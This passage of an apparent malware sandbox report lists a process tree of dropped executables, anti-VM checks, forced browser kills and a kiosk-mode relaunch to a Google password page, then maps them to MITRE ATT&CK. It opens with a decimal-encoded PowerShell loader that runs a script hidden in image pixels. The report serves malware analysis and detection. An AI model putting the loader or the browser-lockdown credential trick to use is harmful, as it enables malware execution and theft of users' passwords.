103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,11
6,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "8⤵
                  - An obfuscated cmd.exe command-line is typically used to evade detection.
                  PID: 2976
            [7] C:\Windows\SysWOW64\rundll32.exe
                cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                PID: 6752
        [5] C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe"
            PID: 5564
          [6] C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 1384
              - Program crash
              PID: 2900
        [5] C:\Users\Admin\AppData\Local\Temp\1005454001\0eea06d992.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1005454001\0eea06d992.exe"
            PID: 5992
        [5] C:\Users\Admin\AppData\Local\Temp\1005455001\75bb7d66af.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1005455001\75bb7d66af.exe"
            PID: 1196
          [6] C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 1580
              - Program crash
              PID: 5508
          [6] C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 1560
              - Program crash
              PID: 6448
    [3] C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        PID: 4140
      [4] C:\Windows\SysWOW64\WerFault.exe
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1528
          - Program crash
          PID: 5184
    [3] C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        PID: 3164
      [4] C:\Windows\SysWOW64\WerFault.exe
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 1532
          - Program crash
          PID: 5636
      [4] C:\Windows\SysWOW64\WerFault.exe
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 1520
          - Program crash
          PID: 740
    [3] C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 1732
      [4] C:\Users\Admin\AppData\Local\Temp\is-UK2UA.tmp\i1A5m12.tmp
          cmdline: "C:\Users\Admin\AppData\Local\Temp\is-UK2UA.tmp\i1A5m12.tmp" /SL5="$A02C0,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
          PID: 548
        [5] C:\Windows\SysWOW64\net.exe
            cmdline: "C:\Windows\system32\net.exe" pause raf_encoder_1252
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 1448
          [6] C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 pause raf_encoder_1252
              - System Location Discovery: System Language Discovery
              PID: 5116
        [5] C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
            cmdline: "C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i
            - Executes dropped EXE
            - Loads dropped DLL
            PID: 2008
    [3] C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        PID: 3180
    [3] C:\Users\Admin\AppData\Local\Temp\1012549001\919e5e3042.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1012549001\919e5e3042.exe"
        PID: 1900
    [3] C:\Users\Admin\AppData\Local\Temp\1012550001\ebfccdcd17.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1012550001\ebfccdcd17.exe"
        PID: 5916
    [3] C:\Users\Admin\AppData\Local\Temp\1012551001\248fbf7a31.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1012551001\248fbf7a31.exe"
        PID: 5928
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /F /IM firefox.exe /T
          - Kills process with taskkill
          PID: 5824
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /F /IM chrome.exe /T
          - Kills process with taskkill
          PID: 3284
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /F /IM msedge.exe /T
          - Kills process with taskkill
          PID: 5176
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /F /IM opera.exe /T
          - Kills process with taskkill
          PID: 7164
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /F /IM brave.exe /T
          - Kills process with taskkill
          PID: 5484
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          PID: 2756
        [5] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            PID: 5856
          [6] C:\Program Files\Mozilla Firefox\firefox.exe
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1944 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0037e10-3cf3-4658-857d-0923f2d74dda} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" gpu
              PID: 5492
          [6] C:\Program Files\Mozilla Firefox\firefox.exe
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2424 -parentBuildID 20240401114208 -prefsHandle 2416 -prefMapHandle 2412 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7f6c57d-4492-4d61-bc03-a0feefcec6bd} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" socket
              PID: 2548
          [6] C:\Program Files\Mozilla Firefox\firefox.exe
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3148 -childID 1 -isForBrowser -prefsHandle 3144 -prefMapHandle 3140 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8dd2e529-5a2d-4737-b58f-42410bb22032} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" tab
              PID: 5588
          [6] C:\Program Files\Mozilla Firefox\firefox.exe
              cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3924 -prefMapHandle 3916 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d126d85-7782-406c-a0bb-4028f8fe444f} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" tab
              PID: 5980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4504 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4476 -prefMapHandle 4480 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f037d67-80a5-43bc-8c4c-a65e9ccdc28b} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" utility6⤵PID:5756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3484 -childID 3 -isForBrowser -prefsHandle 4796 -prefMapHandle 3556 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17d79861-b727-4aa5-8f03-66aeaf4908ba} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" tab6⤵PID:3156
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5524 -childID 4 -isForBrowser -prefsHandle 5444 -prefMapHandle 5448 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2be399f0-5bd5-4c02-a7fe-925ef157674d} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" tab6⤵PID:4488
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 5 -isForBrowser -prefsHandle 5636 -prefMapHandle 5640 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08c0e9fd-7ac4-4ed0-b6ec-46396a167154} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" tab6⤵PID:3524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1940 -parentBuildID 20240401114208 -prefsHandle 2164 -prefMapHandle 3408 -prefsLen 29278 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00f07b5e-035c-4e25-8a10-b7c464d01135} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" gpu6⤵PID:7404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3432 -childID 6 -isForBrowser -prefsHandle 3444 -prefMapHandle 5240 -prefsLen 29278 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b442e95f-42f2-4f2d-a851-dcbcf60a889e} 5856 "\\.\pipe\gecko-crash-server-pipe.5856" tab6⤵PID:2488
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- Kills process with taskkill
PID:4468
-
-
-
C:\Users\Admin\AppData\Local\Temp\1012552001\459fbb5295.exe"C:\Users\Admin\AppData\Local\Temp\1012552001\459fbb5295.exe"3⤵PID:6536
-
-
C:\Users\Admin\AppData\Local\Temp\1012553001\f75c1dae93.exe"C:\Users\Admin\AppData\Local\Temp\1012553001\f75c1dae93.exe"3⤵PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2844 -ip 28441⤵PID:924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2844 -ip 28441⤵PID:4684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2844 -ip 28441⤵PID:3040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2844 -ip 28441⤵PID:3040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2844 -ip 28441⤵PID:4716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4140 -ip 41401⤵PID:3668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2632 -ip 26321⤵PID:1760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3164 -ip 31641⤵PID:6000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3164 -ip 31641⤵PID:5860
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵PID:5980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5564 -ip 55641⤵PID:2896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1196 -ip 11961⤵PID:2508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1196 -ip 11961⤵PID:6756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1196 -ip 11961⤵PID:6648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1196 -ip 11961⤵PID:6628
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵PID:6652
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (4)
  - Credentials In Files (4)
Downloads